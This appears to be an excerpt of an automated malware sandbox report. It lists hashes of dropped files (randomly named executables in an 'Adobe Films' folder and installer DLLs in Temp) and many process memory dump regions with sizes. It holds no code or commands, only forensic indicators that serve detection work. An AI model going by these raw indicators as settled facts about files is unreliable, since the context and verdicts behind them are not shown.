SHA2562b4151a76676f841aeb025d113ceda5d0490bfbf6616cbcf101c7e299cbcb5f2
SHA512d5ae8f1980011ce3b45922ebbdca88f37de7a2ac089de11e50bad235530f96bedb6234f7c5aa32f13a60a29ce7f841f76957119aca615909df6fa453da5a8392
-
C:\Users\Admin\Pictures\Adobe Films\x7X0Exp5JXLQiSV9Bd8veIvG.exeMD5
cb6f0a5bfc40395f58844714615459ae
SHA186a3888444fdbaa719fe721bd57834a7d6ce1b00
SHA25603116e2c133a0b24e6e170e6050a2fb341cba851d6bad9df8c0efcaa1e4546f8
SHA512fff949543a2f9865d426fc672d3f31be8932c819bcf854dcab7cf6ebc212b4d59e54bbb1de7268b13001d9a565542729c8ee641fa19ac56d4d1d73bde21c2f6f
-
C:\Users\Admin\Pictures\Adobe Films\x7X0Exp5JXLQiSV9Bd8veIvG.exeMD5
cb6f0a5bfc40395f58844714615459ae
SHA186a3888444fdbaa719fe721bd57834a7d6ce1b00
SHA25603116e2c133a0b24e6e170e6050a2fb341cba851d6bad9df8c0efcaa1e4546f8
SHA512fff949543a2f9865d426fc672d3f31be8932c819bcf854dcab7cf6ebc212b4d59e54bbb1de7268b13001d9a565542729c8ee641fa19ac56d4d1d73bde21c2f6f
-
C:\Users\Admin\Pictures\Adobe Films\xWNdnVltEX96FstYNvLHfW1j.exeMD5
ffa90fffe7872878c9aeb081635b0c4d
SHA14c8a6c153c9213384fbf53fc1a5c296a216377be
SHA2565ab19aed65f17c63aeb016cb95e214a9e8463c7cf33698927f6afb02d581a245
SHA5122c05ae51599962d4339b5a14e440ef7181c7d7c54cc71129acd98af9a8f6dbf23dc445a29472e1c7a966d054ff4cfc52c979d1b0331e4200930ed4c7e312e289
-
C:\Users\Admin\Pictures\Adobe Films\xWNdnVltEX96FstYNvLHfW1j.exeMD5
ffa90fffe7872878c9aeb081635b0c4d
SHA14c8a6c153c9213384fbf53fc1a5c296a216377be
SHA2565ab19aed65f17c63aeb016cb95e214a9e8463c7cf33698927f6afb02d581a245
SHA5122c05ae51599962d4339b5a14e440ef7181c7d7c54cc71129acd98af9a8f6dbf23dc445a29472e1c7a966d054ff4cfc52c979d1b0331e4200930ed4c7e312e289
-
\Users\Admin\AppData\Local\Temp\is-HNQSA.tmp\idp.dllMD5
8f995688085bced38ba7795f60a5e1d3
SHA15b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35
-
\Users\Admin\AppData\Local\Temp\nsj5741.tmp\INetC.dllMD5
2b342079303895c50af8040a91f30f71
SHA1b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA2562d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47
-
\Users\Admin\AppData\Local\Temp\nsj5741.tmp\INetC.dllMD5
2b342079303895c50af8040a91f30f71
SHA1b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA2562d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47
-
\Users\Admin\AppData\Local\Temp\nsj5741.tmp\System.dllMD5
fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
memory/588-222-0x0000000000400000-0x0000000002DE8000-memory.dmpFilesize
41.9MB
-
memory/588-225-0x0000000003040000-0x00000000030CE000-memory.dmpFilesize
568KB
-
memory/588-224-0x0000000000400000-0x0000000002DE8000-memory.dmpFilesize
41.9MB
-
memory/588-190-0x0000000000400000-0x0000000002DE8000-memory.dmpFilesize
41.9MB
-
memory/588-207-0x0000000000457320-mapping.dmp
-
memory/588-250-0x0000000000400000-0x0000000002DE8000-memory.dmpFilesize
41.9MB
-
memory/588-221-0x0000000002F44000-0x0000000002F93000-memory.dmpFilesize
316KB
-
memory/680-285-0x0000000005680000-0x0000000005681000-memory.dmpFilesize
4KB
-
memory/680-229-0x0000000000CD0000-0x0000000000CD1000-memory.dmpFilesize
4KB
-
memory/680-167-0x0000000000000000-mapping.dmp
-
memory/692-115-0x0000000005B80000-0x0000000005CCA000-memory.dmpFilesize
1.3MB
-
memory/808-298-0x0000000000000000-mapping.dmp
-
memory/828-401-0x0000000000D40000-0x0000000000D89000-memory.dmpFilesize
292KB
-
memory/828-369-0x0000000000000000-mapping.dmp
-
memory/828-403-0x0000000000400000-0x000000000089E000-memory.dmpFilesize
4.6MB
-
memory/1160-431-0x0000000000000000-mapping.dmp
-
memory/1184-181-0x0000000000400000-0x00000000008C5000-memory.dmpFilesize
4.8MB
-
memory/1184-150-0x0000000000A56000-0x0000000000AA6000-memory.dmpFilesize
320KB
-
memory/1184-120-0x0000000000000000-mapping.dmp
-
memory/1184-177-0x0000000000C40000-0x0000000000CD0000-memory.dmpFilesize
576KB
-
memory/1228-189-0x0000000000400000-0x00000000008E3000-memory.dmpFilesize
4.9MB
-
memory/1228-159-0x0000000000996000-0x0000000000A12000-memory.dmpFilesize
496KB
-
memory/1228-183-0x0000000000D60000-0x0000000000E36000-memory.dmpFilesize
856KB
-
memory/1228-135-0x0000000000000000-mapping.dmp
-
memory/1268-508-0x0000000002BE0000-0x0000000002BE2000-memory.dmpFilesize
8KB
-
memory/1396-121-0x0000000000000000-mapping.dmp
-
memory/1396-283-0x0000000005080000-0x0000000005081000-memory.dmpFilesize
4KB
-
memory/1396-282-0x00000000052D0000-0x00000000052D1000-memory.dmpFilesize
4KB
-
memory/1396-253-0x00000000050A0000-0x00000000050A1000-memory.dmpFilesize
4KB
-
memory/1396-231-0x0000000000890000-0x0000000000891000-memory.dmpFilesize
4KB
-
memory/1480-339-0x0000000000000000-mapping.dmp
-
memory/1632-164-0x0000000000000000-mapping.dmp
-
memory/1784-287-0x0000000004D50000-0x0000000004D51000-memory.dmpFilesize
4KB
-
memory/1784-299-0x0000000004E00000-0x0000000004E01000-memory.dmpFilesize
4KB
-
memory/1784-316-0x0000000007810000-0x0000000007811000-memory.dmpFilesize
4KB
-
memory/1784-291-0x0000000002500000-0x0000000002501000-memory.dmpFilesize
4KB
-
memory/1784-163-0x0000000000000000-mapping.dmp
-
memory/1784-279-0x0000000004B70000-0x0000000004B71000-memory.dmpFilesize
4KB
-
memory/1784-293-0x0000000004DA0000-0x0000000004DEC000-memory.dmpFilesize
304KB
-
memory/1784-233-0x0000000000170000-0x0000000000171000-memory.dmpFilesize
4KB
-
memory/1808-116-0x0000000000000000-mapping.dmp
-
memory/1892-133-0x0000000000000000-mapping.dmp
-
memory/1952-223-0x0000000000400000-0x0000000002DBC000-memory.dmpFilesize
41.7MB
-
memory/1952-288-0x0000000007364000-0x0000000007366000-memory.dmpFilesize
8KB
-
memory/1952-152-0x0000000000000000-mapping.dmp
-
memory/1952-276-0x0000000008010000-0x0000000008011000-memory.dmpFilesize
4KB
-
memory/1952-266-0x0000000007363000-0x0000000007364000-memory.dmpFilesize
4KB
-
memory/1952-246-0x00000000030E0000-0x00000000030FF000-memory.dmpFilesize
124KB
-
memory/1952-258-0x0000000007370000-0x0000000007371000-memory.dmpFilesize
4KB
-
memory/1952-205-0x00000000001C0000-0x00000000001F0000-memory.dmpFilesize
192KB
-
memory/1952-249-0x0000000007362000-0x0000000007363000-memory.dmpFilesize
4KB
-
memory/1952-261-0x0000000004E30000-0x0000000004E4D000-memory.dmpFilesize
116KB
-
memory/1952-248-0x0000000007360000-0x0000000007361000-memory.dmpFilesize
4KB
-
memory/2060-137-0x0000000000000000-mapping.dmp
-
memory/2076-218-0x0000000001800000-0x00000000018D8000-memory.dmpFilesize
864KB
-
memory/2076-172-0x0000000000DA0000-0x0000000000DA1000-memory.dmpFilesize
4KB
-
memory/2076-119-0x0000000000000000-mapping.dmp
-
memory/2076-199-0x0000000001A00000-0x0000000001B62000-memory.dmpFilesize
1.4MB
-
memory/2120-136-0x0000000000000000-mapping.dmp
-
memory/2120-149-0x0000000000C10000-0x0000000000C13000-memory.dmpFilesize
12KB
-
memory/2184-232-0x0000000000370000-0x0000000000371000-memory.dmpFilesize
4KB
-
memory/2184-262-0x0000000005A20000-0x0000000005A21000-memory.dmpFilesize
4KB
-
memory/2184-259-0x00000000057C0000-0x00000000057C1000-memory.dmpFilesize
4KB
-
memory/2184-289-0x0000000005880000-0x0000000005881000-memory.dmpFilesize
4KB
-
memory/2184-286-0x0000000005900000-0x0000000005901000-memory.dmpFilesize
4KB
-
memory/2184-192-0x0000000077070000-0x00000000771FE000-memory.dmpFilesize
1.6MB
-
memory/2184-134-0x0000000000000000-mapping.dmp
-
memory/2184-256-0x0000000005F20000-0x0000000005F21000-memory.dmpFilesize
4KB
-
memory/2212-398-0x0000000000000000-mapping.dmp
-
memory/2224-214-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/2224-206-0x0000000000000000-mapping.dmp
-
memory/2404-166-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB
-
memory/2404-123-0x0000000000000000-mapping.dmp
-
memory/2460-297-0x0000000000000000-mapping.dmp
-
memory/2520-122-0x0000000000000000-mapping.dmp
-
memory/2524-184-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/2524-186-0x0000000000402EE8-mapping.dmp
-
memory/2732-165-0x0000000000000000-mapping.dmp
-
memory/2732-281-0x0000000002B00000-0x0000000002B01000-memory.dmpFilesize
4KB
-
memory/2732-230-0x0000000000080000-0x0000000000081000-memory.dmpFilesize
4KB
-
memory/2732-203-0x0000000077070000-0x00000000771FE000-memory.dmpFilesize
1.6MB
-
memory/3032-424-0x00000000026D0000-0x00000000026E6000-memory.dmpFilesize
88KB
-
memory/3032-239-0x0000000000910000-0x0000000000926000-memory.dmpFilesize
88KB
-
memory/3032-481-0x0000000002620000-0x0000000002636000-memory.dmpFilesize
88KB
-
memory/3392-370-0x0000000000000000-mapping.dmp
-
memory/3532-153-0x0000000000000000-mapping.dmp
-
memory/3532-200-0x0000000000D70000-0x0000000000E03000-memory.dmpFilesize
588KB
-
memory/3608-195-0x0000000140000000-0x0000000140C27000-memory.dmpFilesize
12.2MB
-
memory/3608-158-0x0000000000000000-mapping.dmp
-
memory/3608-423-0x0000000140000000-0x0000000140C27000-memory.dmpFilesize
12.2MB
-
memory/3608-204-0x0000000140000000-0x0000000140C27000-memory.dmpFilesize
12.2MB
-
memory/3608-196-0x0000000140000000-0x0000000140C27000-memory.dmpFilesize
12.2MB
-
memory/3724-185-0x0000000000980000-0x0000000000ACA000-memory.dmpFilesize
1.3MB
-
memory/3724-147-0x0000000000000000-mapping.dmp
-
memory/3724-201-0x0000000000400000-0x0000000000890000-memory.dmpFilesize
4.6MB
-
memory/3740-371-0x0000000000000000-mapping.dmp
-
memory/3872-432-0x0000000000000000-mapping.dmp
-
memory/3960-148-0x0000000000000000-mapping.dmp
-
memory/3960-191-0x0000000000400000-0x00000000008F1000-memory.dmpFilesize
4.9MB
-
memory/3960-187-0x0000000000DB0000-0x0000000000E86000-memory.dmpFilesize
856KB
-
memory/4012-312-0x0000000005520000-0x000000000566A000-memory.dmpFilesize
1.3MB
-
memory/4012-294-0x0000000000000000-mapping.dmp
-
memory/4148-335-0x00000000030D0000-0x00000000030D2000-memory.dmpFilesize
8KB
-
memory/4148-300-0x0000000000000000-mapping.dmp
-
memory/4200-216-0x0000000000000000-mapping.dmp
-
memory/4212-217-0x0000000000000000-mapping.dmp
-
memory/4212-267-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4312-498-0x0000000002160000-0x0000000002162000-memory.dmpFilesize
8KB
-
memory/4476-359-0x00000242B3613000-0x00000242B3615000-memory.dmpFilesize
8KB
-
memory/4476-428-0x00000242B3616000-0x00000242B3618000-memory.dmpFilesize
8KB
-
memory/4476-340-0x0000000000000000-mapping.dmp
-
memory/4476-358-0x00000242B3610000-0x00000242B3612000-memory.dmpFilesize
8KB
-
memory/4484-331-0x0000000000000000-mapping.dmp
-
memory/4580-310-0x0000000000418B0E-mapping.dmp
-
memory/4580-308-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4580-337-0x0000000004F60000-0x0000000005566000-memory.dmpFilesize
6.0MB
-
memory/4588-309-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/4588-321-0x0000000002B70000-0x0000000002B71000-memory.dmpFilesize
4KB
-
memory/4588-322-0x0000000002BF0000-0x0000000002BF1000-memory.dmpFilesize
4KB
-
memory/4588-311-0x00000000004368BE-mapping.dmp
-
memory/4636-355-0x0000000000000000-mapping.dmp
-
memory/4640-356-0x0000000000000000-mapping.dmp
-
memory/4660-360-0x0000000000000000-mapping.dmp
-
memory/4672-362-0x0000000000000000-mapping.dmp
-
memory/4732-251-0x0000000000000000-mapping.dmp
-
memory/4744-444-0x0000000000000000-mapping.dmp
-
memory/4824-303-0x0000000000000000-mapping.dmp
-
memory/4868-306-0x00000000006B0000-0x00000000006B1000-memory.dmpFilesize
4KB
-
memory/4868-304-0x0000000000000000-mapping.dmp
-
memory/4868-324-0x000000001B310000-0x000000001B312000-memory.dmpFilesize
8KB
-
memory/4924-315-0x0000000000A70000-0x0000000000A80000-memory.dmpFilesize
64KB
-
memory/4924-319-0x0000000000E70000-0x0000000000E82000-memory.dmpFilesize
72KB
-
memory/4924-305-0x0000000000000000-mapping.dmp
-
memory/5012-489-0x00000000026A0000-0x00000000026A2000-memory.dmpFilesize
8KB
-
memory/5020-474-0x000001D966BD0000-0x000001D966BD2000-memory.dmpFilesize
8KB
-
memory/5020-475-0x000001D966BD3000-0x000001D966BD5000-memory.dmpFilesize
8KB
-
memory/5020-510-0x000001D966BD6000-0x000001D966BD8000-memory.dmpFilesize
8KB
-
memory/5060-364-0x0000000000000000-mapping.dmp
-
memory/5076-349-0x0000000000000000-mapping.dmp
-
memory/5124-405-0x0000000000400000-0x0000000000885000-memory.dmpFilesize
4.5MB
-
memory/5124-397-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB
-
memory/5124-372-0x0000000000000000-mapping.dmp
-
memory/5156-373-0x0000000000000000-mapping.dmp
-
memory/5180-374-0x0000000000000000-mapping.dmp
-
memory/5180-387-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/5220-505-0x0000000002862000-0x0000000002864000-memory.dmpFilesize
8KB
-
memory/5220-506-0x0000000002864000-0x0000000002865000-memory.dmpFilesize
4KB
-
memory/5220-485-0x0000000002860000-0x0000000002862000-memory.dmpFilesize
8KB
-
memory/5432-418-0x0000000000000000-mapping.dmp
-
memory/5760-376-0x0000000000000000-mapping.dmp
-
memory/5772-377-0x0000000000000000-mapping.dmp
-
memory/5776-486-0x0000000002550000-0x0000000002552000-memory.dmpFilesize
8KB
-
memory/5784-378-0x0000000000000000-mapping.dmp
-
memory/5796-447-0x0000000002AA0000-0x0000000002AA2000-memory.dmpFilesize
8KB
-
memory/5796-439-0x0000000000000000-mapping.dmp
-
memory/5800-379-0x0000000000000000-mapping.dmp
-
memory/6028-408-0x0000000000000000-mapping.dmp
-
memory/6044-391-0x0000000000000000-mapping.dmp
-
memory/6084-417-0x0000000005740000-0x0000000005D46000-memory.dmpFilesize
6.0MB
-
memory/6084-396-0x0000000000418AFE-mapping.dmp
-
memory/6124-395-0x0000000000000000-mapping.dmp
-
memory/6124-415-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB